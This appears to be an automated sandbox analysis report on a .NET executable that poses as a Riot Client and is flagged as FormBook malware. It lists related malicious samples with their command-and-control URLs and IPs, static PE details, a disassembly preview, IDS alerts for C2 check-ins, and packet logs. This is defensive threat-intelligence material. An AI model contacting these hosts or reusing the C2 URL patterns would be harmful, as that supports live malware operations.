                                                        • www.thedogmodel.com/hc3i/?JL0HnD=AEOrJsL6rGbsWfDwAgFkWYaihDHts4wGc065KMTZKhXMq5F1yQ8yw1LMQOwMcJswMbru&6l=y6ApP06pAPPL0p7
                                                        Statement.xlsxGet hashmaliciousBrowse
                                                        • www.abbiescottdesigns.com/bsk9/?8paTU=pzuDZXAXFv2D4hw0&6l=MopRYPOW7JCjWP/1sAzbtOEx8U1HhEs2pWXoV4jagQPZKmP7AX4vdyuGLvxuJwa4zZDBpg==
                                                        Payment Instruction.xlsxGet hashmaliciousBrowse
                                                        • www.cannibus-rx.com/gno4/?8p0p4zn=iEPMrV7ILrMnOAVARXhTlFvTv9GbImgTdlMtasoPFVRj/42YGlg1E2zruwKsUVio7YNnfQ==&CxlPa=y2JdyRFP5Fh8i
                                                        F63V4i8eZU.exeGet hashmaliciousBrowse
                                                        • www.mikecdmusic.com/nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o
                                                        BANGKOK REG. SHIPMENT SUPPLY CIF BANGKOK 19-21 FULL DETAILS.exeGet hashmaliciousBrowse
                                                        • www.matkomiljevic.com/b6a4/?Qtx=qCsvzbIaH/CGU0c4Z7vgoGZzfGvizrvtlcJvThT2ItnQlVQYApGwkKJ+zmDyJqz7K2FB&p0GxMv=5jlLiBdP
                                                        order no. YOIMM20190832 pdf.exeGet hashmaliciousBrowse
                                                        • www.strongerpayment.com/h388/?v81=pAstdHxZGWGfHmw1JPDLR+rRdT5Wd2dd0JVjSbi5Tem+ckTFR6mVjiPsXOruuAOIXiwt&s0Ghw=0vlTNP3x_f
                                                        PROFORMA_INVOICE.xlsxGet hashmaliciousBrowse
                                                        • www.satyamsofficial.com/u6bi/?-Z60D0=4hO8rhRxxF4p2bmp&mrW4nr=6/DqqmU67My+o9WIEnQfg15rK68cX3oaURqPZnVLBGXmjCQ8oq4NJd8cVZ2k3j3bm4OM+Q==
                                                        order PI specification N0-00128835%%.exeGet hashmaliciousBrowse
                                                        • www.ghouliani.com/h388/?x48D=bTq2osQPDvHdAPhVpCoSdi9rtLGs2KFahtYfViOOdi/nUy4auo+J+f3F4G5+lTaJ5vsR31D3UQ==&q8m0=MFQh2ZPPwjVHEde
                                                        fb6YVPzIC1.exeGet hashmaliciousBrowse
                                                        • www.kat420nip.com/qmf6/?zd6tZ2=NbNxnFF0fFs88R&bFNp=Zv+eBnpAIFGmTI7p2xr5psf0Vi2YzEWTqeM4kLgFN5W9UQQQa9qsRCWDzA2mJxnFi8Tg
                                                        23BOqgo2Gn.exeGet hashmaliciousBrowse
                                                        • www.blackgirlvanlife.com/7bun/?z48HDp=PlKLWJz0Fllx3pm0&7nFtij=/gN6jVYNMVFDRayqbXkiyfbKJO5JP7TEqi3HPVa1wPvVanYFdjfGyUWlCJ9ff8Kj9D5R
                                                        d6qU4nYIEp.exeGet hashmaliciousBrowse
                                                        • www.wthcoffee.com/dy8g/?Rlr=YtpudndwADuOlBifVFtGWXR4JyGy/IbN+CEsYhZgxxhckievLjWlo+wT/5l3C1gHGS7g&s2JL=Q4SxKzxPg
                                                        PO_8356.pdf.exeGet hashmaliciousBrowse
                                                        • www.briankingfineart.com/ogpo/?7n0lq=dTcfCdwaIiENiusBFYeK5Px0FWRhWt92Mm3lebP8PLXeB8uAjBgQKXEu5MW9c1eHOvJwaxV/uw==&hnQLA0=d2MtV2hhcv98DBGP
                                                        Tlz3P6ra10.exeGet hashmaliciousBrowse
                                                        • www.thriveglucose.com/p2io/?xXk8kx=Bxltd27xbtZdOP20&B6eTzpeH=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9YiKWazZWK0rEbsmGg==
                                                        20hy7F77ShZV221.exeGet hashmaliciousBrowse
                                                        • www.empireofglam.com/cogt/?Z8qDI=rlXPMgteeH67sIOLSF2dCGYbsCcrTcMeWUUTRojqCE8KkK44PwA7ZHnM4ZUcfGmoJZOW&lR-Hn=6lxhenMPDFl4V
                                                        vwffPcT2NE.exeGet hashmaliciousBrowse
                                                        • www.onetinyproject.com/7bun/?9riP=HJHSmVjVEQRXj5S0ipANZWzmM/Hlu23aV6iReq3JvMFZniLQ3bv2HSoq7OV+krl58FR8&kL3Xu=t484X2jh6NJxjj-P
                                                        order spacification pdf.exeGet hashmaliciousBrowse
                                                        • www.strongerpayment.com/h388/?v468Mla=pAstdHxZGWGfHmw1JPDLR+rRdT5Wd2dd0JVjSbi5Tem+ckTFR6mVjiPsXOruuAOIXiwt&-Zr8=V44l1R
                                                        2GuNlCn0X6.exeGet hashmaliciousBrowse
                                                        • www.courtierkabyle.com/ushb/?PjND=Mlr4_4Sx&5j5=Mfaic7BYnuLfA3S1MkBhLcdZBOBWvpPcjePd2T0gGUCe/vHcO4ozxAM2oqSDUjuPRpVV
                                                        6660020210712_0-00010.XLS.exeGet hashmaliciousBrowse
                                                        • www.fostermarketing.energy/wz6a/?nluDS=LrYt&m6ApL=2XZNGGQYktPAsUu/ahuVsaXaEwpRRmnS5lzzQZsl9IG3KGSpvXx68Anyc9UBwoWT17Wg
                                                        SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.23572.rtfGet hashmaliciousBrowse
                                                        • www.listingallauto.com/slpb/?uP=aTQlizohqDVPsbOP&d6Dd=2ZqqrDcZ1B7k5sPUy5cxgCcAt+ptgw4L+UdrKgV+KOSxr7wkLzW4BhqhwhJOrLeK3SNRFg==
                                                        C0TEsC936Q.exeGet hashmaliciousBrowse
                                                        • www.conectaragora.com/n84e/?rfgPc=p6i+kRTx6iVgorjxXMyecgcPSEfEpCNZNLMvo7qFW93Imy9WrDA1CQT3eoMLkfW3eO1IeBYl3w==&3f0x=IN981HP8SlixfBA

                                                        Domains

                                                        No context

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        XIAOZHIYUN1-AS-APICIDCNETWORKUSOrden de compra cotizacion.exeGet hashmaliciousBrowse
                                                        • 23.226.51.219
                                                        U1R7Ed7940Get hashmaliciousBrowse
                                                        • 156.255.211.9
                                                        leyw73RE9oGet hashmaliciousBrowse
                                                        • 23.235.167.110
                                                        Tlz3P6ra10.exeGet hashmaliciousBrowse
                                                        • 156.255.140.216
                                                        TdRlUtrbeS.exeGet hashmaliciousBrowse
                                                        • 154.207.35.108
                                                        Petrogel SOA - Jul21.xlsxGet hashmaliciousBrowse
                                                        • 154.207.35.108
                                                        71q14am5gY.exeGet hashmaliciousBrowse
                                                        • 154.207.35.108
                                                        PO#JFUB0002 FOR NEW ORDER.exeGet hashmaliciousBrowse
                                                        • 156.225.32.61
                                                        factura y factura de la v#U00eda a#U00e9rea.exeGet hashmaliciousBrowse
                                                        • 156.241.53.145
                                                        ZQGMiyaTir.exeGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                        • 156.241.53.127
                                                        eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        Nuvoco_RFQ_21-06-2021.exeGet hashmaliciousBrowse
                                                        • 156.234.184.179
                                                        Gz98aWSGb5.exeGet hashmaliciousBrowse
                                                        • 156.241.53.223
                                                        Swift_Report.exeGet hashmaliciousBrowse
                                                        • 156.241.53.223
                                                        POWlzL.exeGet hashmaliciousBrowse
                                                        • 156.226.160.4
                                                        Purchase_Order.exeGet hashmaliciousBrowse
                                                        • 156.241.53.127
                                                        lTAPQJikGw.exeGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                        • 156.241.53.161
                                                        bank details.exeGet hashmaliciousBrowse
                                                        • 156.224.66.89
                                                        AMAZON-02USkkXJRT8vEl.exeGet hashmaliciousBrowse
                                                        • 52.217.42.228
                                                        kS2dqbsDwD.exeGet hashmaliciousBrowse
                                                        • 52.217.201.169
                                                        Nb2HQZZDIf.exeGet hashmaliciousBrowse
                                                        • 52.216.94.27
                                                        ovLjmo5UoEGet hashmaliciousBrowse
                                                        • 63.34.62.30
                                                        o3ZUDIEL1vGet hashmaliciousBrowse
                                                        • 18.151.13.78
                                                        D1dU3jQ1IIGet hashmaliciousBrowse
                                                        • 34.208.242.240
                                                        mal.exeGet hashmaliciousBrowse
                                                        • 52.58.78.16
                                                        vjsBNwolo9.jsGet hashmaliciousBrowse
                                                        • 76.223.26.96
                                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                                        • 52.217.135.113
                                                        A7X93JRxhpGet hashmaliciousBrowse
                                                        • 54.151.74.14
                                                        1Ds9g7CEspGet hashmaliciousBrowse
                                                        • 13.208.189.104
                                                        XuQRPW44hiGet hashmaliciousBrowse
                                                        • 54.228.23.118
                                                        Taf5zLti30Get hashmaliciousBrowse
                                                        • 44.231.84.110
                                                        5qpsqg7U0GGet hashmaliciousBrowse
                                                        • 34.219.219.82
                                                        LyxN1ckWTWGet hashmaliciousBrowse
                                                        • 18.139.244.68
                                                        ZlvFNj.dllGet hashmaliciousBrowse
                                                        • 3.16.22.120
                                                        U4r9W64doyGet hashmaliciousBrowse
                                                        • 13.245.89.196
                                                        C4PozjQdGEGet hashmaliciousBrowse
                                                        • 18.135.214.121
                                                        kb5IbEJU8cGet hashmaliciousBrowse
                                                        • 18.227.43.189
                                                        MD5OxTSc6iGet hashmaliciousBrowse
                                                        • 18.149.163.217

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NQBNpLezqZKv1P4.exe.log
                                                        Process:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.569459149457171
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:NQBNpLezqZKv1P4.exe
                                                        File size:714240
                                                        MD5:f03bf8d3ecc2ae4b40f836c59ac09bdf
                                                        SHA1:58f48a5a960eac4ee1f33ea16075cfd44f37b3a3
                                                        SHA256:2e4cf88a434d484057fcc090cb7de5deb6d30c8e00da339c886f2482f6a7ebe1
                                                        SHA512:9d174091b1bfb2e38da7cfb521bd5c6e471edb348e8e1c5cddd3b0784be6cd167617277c099d28927f97a24ee6a4e74d62e659dea23264d3c4ec738e6cee0255
                                                        SSDEEP:12288:4G0UB38XcvIFwXbrQtx0ChxIWzZc8o5UJAfEsyaUVKnp:4G0E8XcQWbVuSt5TfEzahp
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............>.... ........@.. .......................@............@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4af93e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x60F8BCE0 [Thu Jul 22 00:33:36 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        int3
                                                        jnc 00007F8DE88E1D8Dh
                                                        test al, EAh
                                                        pushfd
                                                        inc esi
                                                        add eax, 35C2CDF9h
                                                        adc ebp, dword ptr [edi+0Fh]
                                                        stc
                                                        int C2h
                                                        xor eax, 0F6F132Eh
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xaf8ec0x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x618.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xad95c0xada00False0.776407262419data7.57888986763IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xb00000x6180x800False0.3349609375data3.48372701638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xb20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0xb00900x386data
                                                        RT_MANIFEST0xb04280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyright(c) 2019 Riot Games, Inc.
                                                        Assembly Version2.0.26.9
                                                        InternalNameFixedBufferAttribu.exe
                                                        FileVersion2.0.26.9
                                                        CompanyNameRiot Games, Inc.
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameRiot Client
                                                        ProductVersion2.0.26.9
                                                        FileDescriptionRiot Client
                                                        OriginalFilenameFixedBufferAttribu.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        07/22/21-13:15:39.181869TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.66
                                                        07/22/21-13:15:39.181869TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.66
                                                        07/22/21-13:15:39.181869TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976780192.168.2.4199.34.228.66
                                                        07/22/21-13:15:50.171392TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4104.143.9.211
                                                        07/22/21-13:15:50.171392TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4104.143.9.211
                                                        07/22/21-13:15:50.171392TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976980192.168.2.4104.143.9.211

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 22, 2021 13:15:27.243021965 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:27.482089996 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:27.482280970 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:27.482441902 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:27.721946001 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:27.991508961 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:28.273083925 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:33.075309992 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:33.302040100 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:33.302129984 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:33.302323103 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:33.528909922 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:33.804502964 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:34.072108030 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:34.220505953 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:34.220570087 CEST8049766156.241.53.248192.168.2.4
                                                        Jul 22, 2021 13:15:34.220638037 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:34.220674038 CEST4976680192.168.2.4156.241.53.248
                                                        Jul 22, 2021 13:15:38.997890949 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.181548119 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.181768894 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.181869030 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.365695000 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.378952026 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379004002 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379040956 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379069090 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379138947 CEST8049767199.34.228.66192.168.2.4
                                                        Jul 22, 2021 13:15:39.379391909 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.379453897 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:39.379527092 CEST4976780192.168.2.4199.34.228.66
                                                        Jul 22, 2021 13:15:44.485562086 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.675643921 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.675847054 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.676069021 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.865772963 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.885785103 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.885847092 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:44.886029959 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:44.886105061 CEST4976880192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:15:45.075747967 CEST8049768184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:15:47.860467911 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:47.860491037 CEST8049763156.241.53.21192.168.2.4
                                                        Jul 22, 2021 13:15:47.860761881 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:47.860922098 CEST4976380192.168.2.4156.241.53.21
                                                        Jul 22, 2021 13:15:50.048429966 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.171098948 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.171222925 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.171391964 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.294097900 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.310985088 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.311011076 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:50.314615011 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.315505981 CEST4976980192.168.2.4104.143.9.211
                                                        Jul 22, 2021 13:15:50.442882061 CEST8049769104.143.9.211192.168.2.4
                                                        Jul 22, 2021 13:15:55.430165052 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.498688936 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.498841047 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.499026060 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.567529917 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.577905893 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.578178883 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:15:55.578355074 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.578644037 CEST4977080192.168.2.446.137.146.55
                                                        Jul 22, 2021 13:15:55.647133112 CEST804977046.137.146.55192.168.2.4
                                                        Jul 22, 2021 13:16:00.654165983 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:00.847254038 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:00.847501993 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:00.847594023 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:01.042227983 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:01.085139990 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:01.085175991 CEST8049771184.168.131.241192.168.2.4
                                                        Jul 22, 2021 13:16:01.085448980 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:01.085550070 CEST4977180192.168.2.4184.168.131.241
                                                        Jul 22, 2021 13:16:01.278965950 CEST8049771184.168.131.241192.168.2.4

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jul 22, 2021 13:13:49.394126892 CEST5453153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:49.454266071 CEST53545318.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:50.166775942 CEST4971453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:50.255718946 CEST53497148.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:51.725023031 CEST5802853192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:51.777916908 CEST53580288.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:53.322088003 CEST5309753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:53.379755974 CEST53530978.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:54.434233904 CEST4925753192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:54.483282089 CEST53492578.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:55.674511909 CEST6238953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:55.724756956 CEST53623898.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:57.345643044 CEST4991053192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:57.398070097 CEST53499108.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:13:59.108213902 CEST5585453192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:13:59.167979956 CEST53558548.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:00.366065025 CEST6454953192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:00.418442965 CEST53645498.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:01.644599915 CEST6315353192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:01.697521925 CEST53631538.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:02.827272892 CEST5299153192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:02.879297972 CEST53529918.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:04.225826025 CEST5370053192.168.2.48.8.8.8
                                                        Jul 22, 2021 13:14:04.275085926 CEST53537008.8.8.8192.168.2.4
                                                        Jul 22, 2021 13:14:05.790174007 CEST5172653192.168.2.48.8.8.8
